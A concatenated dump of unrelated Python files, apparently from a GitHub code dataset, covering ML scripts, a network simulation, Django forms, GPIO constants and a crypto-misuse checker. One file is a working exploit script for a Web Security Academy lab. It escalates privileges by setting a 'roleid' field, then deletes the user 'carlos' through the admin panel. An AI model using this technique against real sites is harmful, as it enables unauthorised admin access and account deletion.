QWebEnginePage.FindFlags())\n","repo_name":"eliranwong/UniqueBible","sub_path":"gui/WebEngineViewPopover.py","file_name":"WebEngineViewPopover.py","file_ext":"py","file_size_in_byte":18648,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"53"} +{"seq_id":"3222519169","text":"# Import necessary modules\r\nimport tensorflow as tf\r\nfrom tensorflow.keras.applications import ResNet50\r\n\r\n\r\ndef test_cuda_visibility():\r\n print('CUDA visibility')\r\n print('CUDA available', len(tf.config.list_physical_devices('GPU')) > 0)\r\n gpu_devices = tf.config.experimental.get_visible_devices('GPU')\r\n print('CUDA device count', len(gpu_devices))\r\n for gpu_device in gpu_devices:\r\n # Print the properties of each GPU\r\n print(f'*** CUDA {gpu_device.name} ***')\r\n print('Device details:', tf.config.experimental.get_device_details(gpu_device))\r\n\r\n\r\ndef test_inference(device_num: int = 0):\r\n # Configure the GPU options to use only device 1\r\n gpus = tf.config.experimental.get_visible_devices('GPU')\r\n if gpus:\r\n try:\r\n for gpu in gpus:\r\n tf.config.experimental.set_memory_growth(gpu, True)\r\n except RuntimeError as e:\r\n print(e)\r\n with tf.device(f'/GPU:{device_num}'):\r\n # Load the pre-trained ResNet50 model\r\n model = ResNet50(weights='imagenet')\r\n # Generate a random tensor as input\r\n input_tensor = tf.random.uniform((4, 224, 224, 3))\r\n 
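# Show which device the input tensor was placed on\r\n        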
print(input_tensor.device)\r\n # Use the model to conduct prediction on the input tensor\r\n predictions = model.predict(input_tensor).argmax(axis=1)\r\n # Print the predictions\r\n print(predictions)\r\n\r\n\r\ndef test_train():\r\n tf.debugging.set_log_device_placement(True)\r\n\r\n x = tf.random.uniform((5 * 32, 224, 224, 3))\r\n y = tf.random.uniform((5 * 32, 1000), maxval=1, dtype=tf.dtypes.int64)\r\n\r\n model = ResNet50(weights=None)\r\n model.compile(optimizer='adam', loss='categorical_crossentropy')\r\n\r\n with tf.device('/GPU:0'):\r\n # Fit the model on the input data and labels\r\n model.fit(x, y, epochs=1)\r\n\r\n\r\ndef test_train_dp():\r\n # Load the ResNet50 model\r\n model = ResNet50(weights=None)\r\n\r\n x = tf.random.uniform((10 * 32, 224, 224, 3))\r\n y = tf.random.uniform((10 * 32, 1000), maxval=1, dtype=tf.dtypes.int64)\r\n\r\n # Compile the model\r\n model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\r\n\r\n # Define a dataset and iterator\r\n dataset = tf.data.Dataset.from_tensor_slices((x, y))\r\n dataset = dataset.batch(32).repeat()\r\n iterator = iter(dataset)\r\n\r\n # Define a strategy for data parallelism\r\n strategy = tf.distribute.MirroredStrategy()\r\n\r\n # Define a function for the data parallelism\r\n def data_parallelism(inputs, labels):\r\n # Calculate the predictions on each GPU\r\n predictions = []\r\n for i in range(strategy.num_replicas_in_sync):\r\n with strategy.scope():\r\n output = model(inputs[i], training=True)\r\n predictions.append(output)\r\n\r\n # Concatenate the predictions and calculate the loss\r\n predictions = tf.concat(predictions, axis=0)\r\n loss = tf.reduce_mean(tf.keras.losses.categorical_crossentropy(labels, predictions))\r\n\r\n # Calculate the gradients and apply them to the model\r\n gradients = tf.gradients(loss, model.trainable_variables)\r\n optimizer = tf.optimizers.Adam(learning_rate=0.001)\r\n update_ops = optimizer.apply_gradients(zip(gradients, model.trainable_variables))\r\n\r\n # Return the loss and update operations\r\n return loss, update_ops\r\n\r\n # Define a training loop\r\n for epoch in range(1):\r\n # Split the inputs and labels for each GPU\r\n inputs, labels = next(iterator)\r\n inputs = tf.split(inputs, strategy.num_replicas_in_sync)\r\n labels = tf.split(labels, strategy.num_replicas_in_sync)\r\n\r\n # Run the data parallelism function\r\n loss, update_ops = data_parallelism(inputs, labels)\r\n with tf.control_dependencies(update_ops):\r\n train_op = tf.no_op()\r\n with strategy.scope():\r\n train_op.run()\r\n\r\n\r\nif __name__ == '__main__':\r\n test_cuda_visibility()\r\n # test_inference()\r\n # test_multi_gpu_inference()\r\n # test_train()\r\n test_train_dp()\r\n","repo_name":"MLSysOps/MIGProfiler","sub_path":"exp/compatibility/train/test_tf.py","file_name":"test_tf.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"53"} +{"seq_id":"13635858863","text":"import pytest\nfrom redis import Redis\n\nfrom redis_streams_test.test_utils import STREAM, set_logger, TEST_DATASET\n\n\nclass TestBase:\n redis_conn = Redis(decode_responses=True)\n logger = set_logger()\n\n @pytest.fixture(autouse=True)\n def prepare_redis(self):\n if self.redis_conn.xlen(name=STREAM):\n self.logger.info(f'Trim {STREAM}')\n self.redis_conn.xtrim(STREAM, maxlen=0)\n for test_data in TEST_DATASET:\n self.logger.debug(f\"Add test data: {test_data}\")\n self.redis_conn.xadd(name=STREAM, fields=test_data)\n 
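# The stream should now contain exactly one entry per test record\n        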
assert self.redis_conn.xlen(name=STREAM) == len(TEST_DATASET)\n yield\n self.redis_conn.xtrim(STREAM, maxlen=0)\n for group in self.redis_conn.xinfo_groups(name=STREAM):\n self.redis_conn.xgroup_destroy(name=STREAM, groupname=group.get(\"name\"))\n self.redis_conn.delete(STREAM)\n","repo_name":"KissPeter/redis-streams","sub_path":"redis_streams_test/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"26028895995","text":"import numpy as np\nimport pandas as pd\nimport keras\nimport codecs\nimport re\nfrom keras_bert import Tokenizer, get_custom_objects\n\n\n# # focal loss with multi label\n# def focal_loss(classes_num, gamma=2., alpha=.25, e=0.1):\n# # classes_num contains sample number of each classes\n# def focal_loss_fixed(target_tensor, prediction_tensor):\n# '''\n# prediction_tensor is the output tensor with shape [None, 100], where 100 is the number of classes\n# target_tensor is the label tensor, same shape as predcition_tensor\n# '''\n# import tensorflow as tf\n# from tensorflow.python.ops import array_ops\n# from keras import backend as K\n\n# #1# get focal loss with no balanced weight which presented in paper function (4)\n# zeros = array_ops.zeros_like(prediction_tensor, dtype=prediction_tensor.dtype)\n# one_minus_p = array_ops.where(tf.greater(target_tensor,zeros), target_tensor - prediction_tensor, zeros)\n# FT = -1 * (one_minus_p ** gamma) * tf.log(tf.clip_by_value(prediction_tensor, 1e-8, 1.0))\n\n# #2# get balanced weight alpha\n# classes_weight = array_ops.zeros_like(prediction_tensor, dtype=prediction_tensor.dtype)\n\n# total_num = float(sum(classes_num))\n# classes_w_t1 = [ total_num / ff for ff in classes_num ]\n# sum_ = sum(classes_w_t1)\n# classes_w_t2 = [ ff/sum_ for ff in classes_w_t1 ] #scale\n# classes_w_tensor = tf.convert_to_tensor(classes_w_t2, dtype=prediction_tensor.dtype)\n# classes_weight += classes_w_tensor\n\n# alpha = array_ops.where(tf.greater(target_tensor, zeros), classes_weight, zeros)\n\n# #3# get balanced focal loss\n# balanced_fl = alpha * FT\n# balanced_fl = tf.reduce_mean(balanced_fl)\n\n# #4# add other op to prevent overfit\n# # reference : https://spaces.ac.cn/archives/4493\n# nb_classes = len(classes_num)\n# fianal_loss = (1-e) * balanced_fl + e * K.categorical_crossentropy(K.ones_like(prediction_tensor)/nb_classes, prediction_tensor)\n\n# return fianal_loss\n# return focal_loss_fixed\n\nmodel_name = 'roberta-wwm-large-ext'\nmodel_type = 'normal'\ntest_df = pd.read_csv('../data/Test_DataSet.csv')\ntest_df = test_df.fillna('EMPTY')\ntest_df['titlecontent'] = test_df['title'] + test_df['content']\n\n# text_list = []\n# for i in range(test_df.shape[0]):\n# text = test_df['titlecontent'][i]\n# text = re.sub(r'\\\\n+', '。', text)\n# text = text.replace('。。', '。')\n# text = text.replace('?。', '。')\n# text = text.replace('!。', '。')\n# text = text.replace(' 。', '。')\n# text_list.append(text)\n# test_df['titlecontent'] = text_list\n\nvocab_path = '../bert_model/%s/vocab.txt'%(model_name)\ntoken_dict = {}\nwith codecs.open(vocab_path, 'r', 'utf8') as reader:\n for line in reader:\n token = line.strip()\n token_dict[token] = len(token_dict)\n\nSEQ_LEN = 512\ncustom_objects = get_custom_objects()\n# custom_objects['focal_loss_fixed'] = focal_loss([763, 3640, 2925])\nmodel = keras.models.load_model('./model/%s-%s.h5'%(model_name, model_type), custom_objects=custom_objects)\n\ntokenizer = Tokenizer(token_dict)\n\nclass 
OurTokenizer(Tokenizer):\n def _tokenize(self, text):\n R = []\n for c in text:\n if c in self._token_dict:\n R.append(c)\n elif self._is_space(c):\n R.append('[unused1]') # space类用未经训练的[unused1]表示\n else:\n R.append('[UNK]') # 剩余的字符是[UNK]\n return R\n\ntokenizer = OurTokenizer(token_dict)\n\ntest_text = [text for text in test_df['titlecontent'].values]\nindices = []\nfor text in test_text:\n ids, segments = tokenizer.encode(text, max_len=SEQ_LEN)\n indices.append(ids)\nindices = np.array(indices)\nX_test = [indices, np.zeros_like(indices)]\n\ny_pred = model.predict(X_test)\nnew_label = np.argmax(y_pred, axis=1)\n\nnew_id = test_df['id'].values\n\nsubmission_df = pd.DataFrame()\nsubmission_df['id'] = new_id\n# submission_df['label'] = new_label\nsubmission_df['prob1'] = y_pred[:, 0]\nsubmission_df['prob2'] = y_pred[:, 1]\nsubmission_df['prob3'] = y_pred[:, 2]\nsubmission_df.to_csv('%s-%s_prob.csv'%(model_name, model_type), index=None)\n\n","repo_name":"linytsysu/news-emotion-analysis","sub_path":"fine-tune/submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8810684751","text":"# User role can be modified in user profile\n\nimport sys\nimport requests\nimport urllib3\nimport urllib.parse\nimport re\nimport time\nimport warnings\n\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nproxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\n\n##########################################################\n#\tFUNCTIONS\n##########################################################\n\ndef delete_carlos(s, url):\n\tlogin_path = url + '/login'\n\ttime.sleep(1)\n\tdata_login = {'username': 'wiener', 'password': 'peter'}\n\tprint('\\n[+] Trying to connect to the application as Wiener...')\n\tr = s.post(login_path, data=data_login)\n\ttime.sleep(1)\n\tif 'Your username is: wiener' in r.text:\n\t\tprint('[+] Logged in as Wiener !')\n\t\tchange_email_path = url + '/my-account/change-email'\n\t\tdata_role = {'email': 'gwyo@attacker.com', 'roleid': 2}\n\t\tprint('[+] Trying to change the role ID to find Admin panel...')\n\t\tr = s.post(change_email_path, json=data_role)\n\t\ttime.sleep(1)\n\t\tif 'Admin panel' in r.text:\n\t\t\tprint(\"[+] Admin panel found !\")\n\t\t\tdelete_user_path = url + \"/admin/delete?username=carlos\"\n\t\t\tprint('[+] Trying to delete Carlos user...')\n\t\t\tr = s.get(delete_user_path)\n\t\t\ttime.sleep(1)\n\t\t\tres = r.text\n\t\t\tif 'User deleted successfully!' in res:\n\t\t\t\tprint('[+] Carlos user successfully deleted !')\n\t\t\telse:\n\t\t\t\tprint('[-] Exploit failed to delete Carlos user ')\n\t\telse:\n\t\t\tprint('[-] Exploit failed to get Admin role ')\n\telse:\n\t\tprint('[-] Exploit failed to connect as Wiener ')\n\ndef show_usage():\n\tprint('[+] Usage: %s ' % sys.argv[0])\n\tprint('[+] Example: %s https://www.target.com' % sys.argv[0])\n\tsys.exit(-1)\n\n##########################################################\n#\tMAIN\n##########################################################\n\ndef main():\n\tprint('[+] Lab: User role can be modified in user profile')\n\ttry:\n\t\turl = sys.argv[1].strip()\n\texcept IndexError:\n\t\tshow_usage()\n\ts = requests.Session()\n\ts.proxies = proxies\t\t# Comment this line to disable proxying\n\ts.verify = False\n\ttry:\n\t\tr = s.get(url, allow_redirects=False)\n\t\ttime.sleep(1)\n\t\tif '
Error
' in r.text or 'Server Error: Gateway Timeout' in r.text:\n\t\t\tprint('\\n[-] HOST seems to be down ')\n\t\t\tsys.exit(-1)\n\t\telse:\n\t\t\tprint('[+] Trying to find Unprotected feature to delete Carlos user...\\n')\n\t\t\ttime.sleep(1)\n\t\t\tparsed_url = urllib.parse.urlparse(url)\n\t\t\thost = parsed_url.netloc\n\t\t\tif parsed_url.port:\n\t\t\t\tport = parsed_url.port\n\t\t\telif parsed_url.scheme == \"https\":\n\t\t\t\tport = 443\n\t\t\telif parsed_url.scheme == \"http\":\n\t\t\t\tport = 80\n\t\t\tprint(parsed_url)\n\t\t\turl = parsed_url.scheme + '://' + host\n\t\t\ttime.sleep(2)\n\t\t\tr = delete_carlos(s, url)\n\t\t\ts.cookies.clear()\n\t\t\ttime.sleep(2)\n\t\t\tr = s.get(url)\n\t\t\tif 'Congratulations, you solved the lab!' in r.text:\n\t\t\t\tprint('\\n[+] The lab is solved !')\n\texcept requests.exceptions.ProxyError:\n\t\tprint('[-] PROXY seems to be missconfigured ')\n\texcept KeyboardInterrupt:\n\t\tsys.exit(0)\n\nif __name__ == \"__main__\":\n\tmain()\n\n","repo_name":"gwyomarch/WebSecurityAcademy","sub_path":"AccessControl/exploit-lab04.py","file_name":"exploit-lab04.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74172609129","text":"import multiprocessing\nimport random\nfrom typing import Dict\n\nimport simpy\nfrom matplotlib import pyplot as plt\n\nfrom result_container import ResultContainer\nfrom src import default_architecture_parameters\nfrom src.clients.data_producer_client import DataProducerClient\nfrom src.processing_units.processing_location_central import ProcessingLocationCentral\nfrom src.processing_units.processing_location_city import ProcessingLocationCity\nfrom src.processing_units.processing_location_continent import ProcessingLocationContinent\nfrom src.processing_units.processing_location_country import ProcessingLocationCountry\nfrom src.processing_units.processing_location_district import ProcessingLocationDistrict\nfrom src.processing_units.processing_location_territory import ProcessingLocationTerritory\nfrom src.processing_units.on_processing_ended_enum import OnProcessingEndedEnum\n\nTOTAL_NUMBER_OF_PRODUCER_CLIENTS = 2000\nTOTAL_PACKAGES_PRODUCED_BY_EACH_CLIENT = 3 # Note: each client has a waiting time before producing a new package.\n\nCONFIGURATIONS = [\n {\n \"name\": \"With the Edge\",\n \"type\": \"edge\",\n },\n {\n \"name\": \"Cloud\",\n \"type\": \"cloud\",\n },\n]\n\n\ndef run_configuration(config: Dict) -> ResultContainer:\n print(f\"################## Running configuration: {config['name']}\")\n\n # Setup the simulation.\n result_container = ResultContainer(simulation_name=config['name'], simulation_type=config['type'])\n env = simpy.Environment()\n\n # Setup processes in the simulation.\n if config[\"type\"] == \"edge\":\n edge_central = ProcessingLocationCentral(\n simpy_env=env,\n result_container=result_container,\n name=f'Central',\n is_data_coming_from_first_link=False,\n mean_distance_km=default_architecture_parameters.MEAN_DISTANCE_DISTRICT_CENTRAL,\n std_distance_km=default_architecture_parameters.STD_DISTANCE_DISTRICT_CENTRAL,\n on_processing_ended_specification=OnProcessingEndedEnum.SAVE_TOTAL_LATENCY, # Save only here.\n )\n edge_central.start_listening_for_incoming_data()\n\n edge_continents = []\n for i in range(default_architecture_parameters.NUMBER_OF_CONTINENTS):\n edge_continent = ProcessingLocationContinent(\n simpy_env=env,\n result_container=result_container,\n name=f'Continent{i}',\n 
is_data_coming_from_first_link=False,\n mean_distance_km=default_architecture_parameters.MEAN_DISTANCE_DISTRICT_CONTINENT,\n std_distance_km=default_architecture_parameters.STD_DISTANCE_DISTRICT_CONTINENT,\n on_processing_ended_specification=OnProcessingEndedEnum.DO_NOTHING, # Otherwise latency is considered for multiple packages since in parallel.\n )\n edge_continent.start_listening_for_incoming_data()\n edge_continents.append(edge_continent)\n\n edge_countries = []\n for i in range(default_architecture_parameters.NUMBER_OF_COUNTRIES):\n edge_country = ProcessingLocationCountry(\n simpy_env=env,\n result_container=result_container,\n name=f'Country{i}',\n is_data_coming_from_first_link=False,\n mean_distance_km=default_architecture_parameters.MEAN_DISTANCE_DISTRICT_COUNTRY,\n std_distance_km=default_architecture_parameters.STD_DISTANCE_DISTRICT_COUNTRY,\n on_processing_ended_specification=OnProcessingEndedEnum.DO_NOTHING, # Otherwise latency is considered for multiple packages since in parallel.\n )\n edge_country.start_listening_for_incoming_data()\n edge_countries.append(edge_country)\n\n edge_territories = []\n for i in range(default_architecture_parameters.NUMBER_OF_TERRITORIES):\n edge_territory = ProcessingLocationTerritory(\n simpy_env=env,\n result_container=result_container,\n name=f'Territory{i}',\n is_data_coming_from_first_link=False,\n mean_distance_km=default_architecture_parameters.MEAN_DISTANCE_DISTRICT_TERRITORY,\n std_distance_km=default_architecture_parameters.STD_DISTANCE_DISTRICT_TERRITORY,\n on_processing_ended_specification=OnProcessingEndedEnum.DO_NOTHING, # Otherwise latency is considered for multiple packages since in parallel.\n )\n edge_territory.start_listening_for_incoming_data()\n edge_territories.append(edge_territory)\n\n edge_cities = []\n for i in range(default_architecture_parameters.NUMBER_OF_CITIES):\n edge_city = ProcessingLocationCity(\n simpy_env=env,\n result_container=result_container,\n name=f'City{i}',\n is_data_coming_from_first_link=False,\n mean_distance_km=default_architecture_parameters.MEAN_DISTANCE_DISTRICT_CITY,\n std_distance_km=default_architecture_parameters.STD_DISTANCE_DISTRICT_CITY,\n on_processing_ended_specification=OnProcessingEndedEnum.DO_NOTHING, # Otherwise latency is considered for multiple packages since in parallel.\n )\n edge_city.start_listening_for_incoming_data()\n edge_cities.append(edge_city)\n\n edge_receivers = []\n for i in range(default_architecture_parameters.NUMBER_OF_DISTRICTS):\n connected_edge_aggregators = [\n edge_central,\n random.choice(edge_continents),\n random.choice(edge_countries),\n random.choice(edge_territories),\n random.choice(edge_cities)\n ]\n transmissions = [connected_edge_aggregator.get_incoming_transmission() for connected_edge_aggregator in connected_edge_aggregators]\n assert len(transmissions) == 5\n edge_receiver = ProcessingLocationDistrict(\n simpy_env=env,\n result_container=result_container,\n name=f'District{i}',\n mean_distance_km=default_architecture_parameters.MEAN_DISTANCE_CLIENT_DISTRICT,\n std_distance_km=default_architecture_parameters.STD_DISTANCE_CLIENT_DISTRICT,\n on_processing_ended_specification=OnProcessingEndedEnum.SEND_TO_AGGREGATOR,\n transmissions_to_aggregators=transmissions,\n )\n edge_receiver.start_listening_for_incoming_data()\n edge_receivers.append(edge_receiver)\n\n for i in range(TOTAL_NUMBER_OF_PRODUCER_CLIENTS):\n connected_edge_receiver = random.choice(edge_receivers)\n transmission = connected_edge_receiver.get_incoming_transmission()\n 
data_producer = DataProducerClient(\n simpy_env=env,\n result_container=result_container,\n name=f'DataProducerClient{i}',\n transmission_to_data_collector=transmission,\n number_of_packages_to_produce=TOTAL_PACKAGES_PRODUCED_BY_EACH_CLIENT\n )\n data_producer.start_producing_data()\n elif config[\"type\"] == \"cloud\": # If cloud, setup the cloud and data_producers\n cloud = ProcessingLocationCentral(\n simpy_env=env,\n result_container=result_container,\n name=\"Cloud\",\n is_data_coming_from_first_link=True,\n mean_distance_km=default_architecture_parameters.MEAN_DISTANCE_CLIENT_CENTRAL,\n std_distance_km=default_architecture_parameters.STD_DISTANCE_CLIENT_CENTRAL,\n on_processing_ended_specification=OnProcessingEndedEnum.SAVE_TOTAL_LATENCY,\n )\n cloud.start_listening_for_incoming_data()\n\n for i in range(TOTAL_NUMBER_OF_PRODUCER_CLIENTS):\n transmission = cloud.get_incoming_transmission()\n data_producer = DataProducerClient(\n simpy_env=env,\n result_container=result_container,\n name=f'DataProducerClient{i}',\n transmission_to_data_collector=transmission,\n number_of_packages_to_produce=TOTAL_PACKAGES_PRODUCED_BY_EACH_CLIENT\n )\n data_producer.start_producing_data()\n else:\n raise Exception('Type not recognized')\n\n # Run simulation.\n env.run()\n\n result_container.print_result(should_total_be_equal_to_sum_of_parts=False) # Total latency not equal to sum of parts because data sent to multiple aggregators in parallel.\n return result_container\n\n\npool = multiprocessing.Pool()\nresults = pool.map(run_configuration, CONFIGURATIONS)\n\n# Prepare plot variables\ntotal_latencies = [result.get_average_total_latency() for result in results]\nfirst_traffic_per_distance = [result.get_total_first_link_traffic_per_distance() for result in results]\nsecond_traffic_per_distance = [result.get_total_second_link_traffic_per_distance() for result in results]\nnames = [result.simulation_name for result in results]\ncolors = ['green' if result.simulation_type == 'edge' else 'red' for result in results]\nx_positions = (range(len(results)))\n\n# Plot total latency.\nplt.figure(figsize=(5, 5))\nplt.title('Write Latencies')\nplt.bar(x_positions, total_latencies, color=colors)\nplt.axes().yaxis.grid() # horizontal lines\nplt.xticks(x_positions, names)\nplt.ylabel(\"Average Write Latency\")\nplt.tight_layout()\nplt.show()\n\n# Plot sum of traffic uncut.\nplt.figure(figsize=(5, 5))\nplt.title('Traffic * Distance')\nbars1 = first_traffic_per_distance\nbars2 = second_traffic_per_distance\nprint(results[0].traffic_per_distance_second_link_list[:100])\nprint(bars1)\nprint(bars2)\nplt.bar(x_positions, bars1, color='#333333')\nplt.bar(x_positions, bars2, bottom=bars1, color='#2d7f5e')\nplt.xticks(x_positions, names)\nplt.ylabel(\"Total (traffic in MB) * (distance in Km)\")\nplt.legend([\"First link\", \"Second Link\"])\nplt.tight_layout()\nplt.show()\n\n# Plot sum of traffic cut.\nplt.figure(figsize=(5, 5))\ncut_limit = int(1.5 * (first_traffic_per_distance[-2] + second_traffic_per_distance[-2]))\nplt.title(f'Total traffic * distance (cut at {cut_limit})')\nbars1 = first_traffic_per_distance\nbars2 = second_traffic_per_distance\nplt.bar(x_positions, bars1, color='#333333')\nplt.bar(x_positions, bars2, bottom=bars1, color='#2d7f5e')\nplt.axes().set_ylim([None, cut_limit])\nplt.xticks(x_positions, names)\nplt.ylabel(\"Total (traffic in MB) * (distance in Km)\")\nplt.legend([\"First link\", \"Second 
Link\"])\nplt.tight_layout()\nplt.show()\n","repo_name":"Desno365/location-aware-edge-api","sub_path":"evaluation/python-simulator/src/simulation_write_all_levels.py","file_name":"simulation_write_all_levels.py","file_ext":"py","file_size_in_byte":10499,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"33770898811","text":"from django import forms\nfrom .models import RecruitmentModel\nfrom Interviewer.models import InterviewSchedule\n\nclass RecruitmentForm(forms.ModelForm):\n OpportunityCode = forms.IntegerField()\n Qualification = forms.CharField()\n Registration_start_date = forms.DateField(widget=forms.SelectDateWidget)\n Age_limit = forms.IntegerField(min_value=21,max_value=45)\n Last_date_of_apply =forms.DateField(widget=forms.SelectDateWidget)\n Department_id = forms.CharField(label=\"Department ID\")\n No_Of_Positions = forms.IntegerField()\n Description = forms.CharField(widget=forms.Textarea)\n Responsibilities = forms.CharField()\n Contact_no = forms.IntegerField()\n\n class Meta:\n model=RecruitmentModel\n fields=\"__all__\"\n\n\nclass InterviewScheduleForm(forms.ModelForm):\n class Meta:\n model=InterviewSchedule\n fields=\"__all__\"","repo_name":"DharmeshRS/HR_Management_System","sub_path":"HRMS/Manager/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43301068571","text":"FONT_HEIGHT=12\nGPIO_START=20 # this is active high\nGPIO_FUNC=16 # this is active low\nGPIO_BSIM=26 # when high, the battery simulator is powered on\nGPIO_ISENSE=19 # when high, current sense mode is high\nGPIO_VBUS=21 # when high VBUS is applied to DUT\nGPIO_UART_SOC=18 # when high, the UART is routed to the SoC; when low, to the EC\nGPIO_PROG_B=24 # when low, the FPGA PROG_B line is asserted\nGPIO_CRESET_N=25 # when low, the EC reset line is asserted\nGPIO_AUD_HPR=0 # when high, the right headphone is looped back to the mic\nGPIO_AUD_HPL=5 # when high, the left headphone is looped back to the mic\nGPIO_AUD_SPK=26 # when high, the speaker output is looped back to the mic. 
Note left digital channel == speaker\nGPIO_VIBE_SENSE=13 # when low, the vibe motor is being driven\n\nGPIO_DRV_UP5K_N=23\nGPIO_UP5K_MOSI=10\nGPIO_UP5K_MISO=9\nGPIO_UP5K_SCK=11\nGPIO_UP5K_CSN=8\n\nGPIO_JTAG_TCK=4\nGPIO_JTAG_TMS=17\nGPIO_JTAG_TDI=27\nGPIO_JTAG_TDO=22\n\n\nHAT_RED_LED = 12\nHAT_GREEN_LED = 16\nHAT_WHITE_LED = 20\nHAT_START = 7\n\n","repo_name":"betrusted-io/bootstrap-mainboard","sub_path":"gpiodefs.py","file_name":"gpiodefs.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"34496620564","text":"from .constant_keys import ConstantKeysChecker\nfrom .constant_salts import ConstantSaltsChecker\nfrom .constant_ivs import ConstantIVsChecker\nfrom .pbe_iterations import PBEIterationsChecker\nfrom .rsa_key_sizes import RSAKeySizesChecker\nfrom .unsafe_evp_algorithms import UnsafeEVPAlogirthmsChecker\nfrom .unsafe_algorithms import UnsafeAlgorithmsChecker\n\n\nclass CheckerPrototype:\n def __init__(self, name, desc, criteria):\n self.name = name\n self.desc = desc\n self.criteria = criteria\n\n\ndefault_checkers = {\n ConstantKeysChecker: [\n (\"crypt\", 0),\n (\"DES_crypt\", 0),\n (\"DES_fcrypt\", 0),\n (\"EVP_CipherInit\", 2),\n (\"EVP_EncryptInit\", 2),\n (\"EVP_DecryptInit\", 2),\n (\"EVP_CipherInit_ex\", 3),\n (\"EVP_EncryptInit_ex\", 3),\n (\"EVP_DecryptInit_ex\", 3),\n (\"EVP_CipherInit_ex2\", 2),\n (\"EVP_EncryptInit_ex2\", 2),\n (\"EVP_DecryptInit_ex2\", 2),\n (\"AES_set_encrypt_key\", 0),\n (\"AES_set_decrypt_key\", 0),\n (\"DES_set_key\", 0),\n ],\n ConstantSaltsChecker: [\n (\"crypt\", 1),\n (\"DES_crypt\", 1),\n (\"DES_fcrypt\", 1),\n (\"EVP_BytesToKey\", 2),\n ],\n ConstantIVsChecker: [\n (\"EVP_CipherInit\", 3),\n (\"EVP_EncryptInit\", 3),\n (\"EVP_DecryptInit\", 3),\n (\"EVP_CipherInit_ex\", 4),\n (\"EVP_EncryptInit_ex\", 4),\n (\"EVP_DecryptInit_ex\", 4),\n (\"EVP_CipherInit_ex2\", 3),\n (\"EVP_EncryptInit_ex2\", 3),\n (\"EVP_DecryptInit_ex2\", 3),\n (\"AES_cbc_encrypt\", 4),\n ],\n PBEIterationsChecker: [(\"EVP_BytesToKey\", 5)],\n RSAKeySizesChecker: [\n (\"EVP_RSA_gen\", 0),\n (\"RSA_generate_key_ex\", 1),\n (\"RSA_generate_multi_prime_key\", 1),\n (\"EVP_RSA_gen_key\", 0),\n ],\n UnsafeEVPAlogirthmsChecker: [\n (\"EVP_BytesToKey\", 0),\n (\"EVP_CipherInit\", 1),\n (\"EVP_EncryptInit\", 1),\n (\"EVP_DecryptInit\", 1),\n (\"EVP_CipherInit_ex\", 1),\n (\"EVP_EncryptInit_ex\", 1),\n (\"EVP_DecryptInit_ex\", 1),\n (\"EVP_CipherInit_ex2\", 1),\n (\"EVP_EncryptInit_ex2\", 1),\n (\"EVP_DecryptInit_ex2\", 1),\n (\"EVP_DigestInit\", 1),\n (\"EVP_DigestInit_ex\", 1),\n (\"EVP_DigestInit_ex2\", 1),\n ],\n UnsafeAlgorithmsChecker: [\n (\"AES_ecb_encrypt\", 0),\n (\"DES_ecb_encrypt\", 0),\n (\"DES_ecb2_encrypt\", 0),\n (\"DES_ecb3_encrypt\", 0),\n (\"SHA1\", 0),\n (\"SHA1_Init\", 0),\n (\"MD2\", 0),\n (\"MD2_Init\", 0),\n (\"MD4\", 0),\n (\"MD4_Init\", 0),\n (\"MD5\", 0),\n (\"MD5_Init\", 0),\n # (\"EVP_aes_128_ecb\", 0),\n # (\"EVP_aes_192_ecb\", 0),\n # (\"EVP_aes_256_ecb\", 0)\n ],\n}\n\ntarget_apis = set()\nfor _, criteria in default_checkers.items():\n for func_name, _ in criteria:\n target_apis.add(func_name)\n","repo_name":"bluesadi/Yasat","sub_path":"Yasat/checkers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"33155300379","text":"\nimport argparse\nfrom smartlabel.Dataset import Dataset\nfrom smartlabel.Project import 
Project\nfrom smartlabel.Label import Label_Object\nfrom tabulate import tabulate\nimport sys\nimport requests\nimport json\nfrom pathlib import Path\nfrom os.path import join\nimport os\nfrom shutil import rmtree\n\nAPI_URL = 'http://127.0.0.1:5000/'\nhome = str(Path.home())\nCONFIG_FILE_FOLDER = join(home, '.smartlabel')\nCONFIG_FILE_PATH = join(CONFIG_FILE_FOLDER, 'config')\n\n\ndocstring = \"*\"*99 + \"\"\" Smartlabel command line interface.\n\"\"\" + \"*\"*99\nparser = argparse.ArgumentParser(description=docstring)\n\nparser.add_argument(\"--login\", default=argparse.SUPPRESS, nargs=2, help=\"Enter two arguments, api key and api seceret.\")\nparser.add_argument(\"--logout\", default=argparse.SUPPRESS, nargs=\"?\")\n\nparser.add_argument(\"--list-projects\", default=argparse.SUPPRESS, nargs='?')\nparser.add_argument(\"--get-project\", default=argparse.SUPPRESS, nargs='?')\nparser.add_argument(\"--create-project\", default=argparse.SUPPRESS, nargs=1)\nparser.add_argument(\"--create-dataset\", default=argparse.SUPPRESS, nargs=1)\nparser.add_argument(\"--create-dataset-rows-from-directory\", default=argparse.SUPPRESS, nargs=1)\nparser.add_argument(\"--create-dataset-row-from-s3\", default=argparse.SUPPRESS, nargs=1, type=str)\nparser.add_argument(\"--create-dataset-row-from-csv\", default=argparse.SUPPRESS, nargs=1, type=str)\nparser.add_argument(\"--create-dataset-row-from-txt\", default=argparse.SUPPRESS, nargs=1, 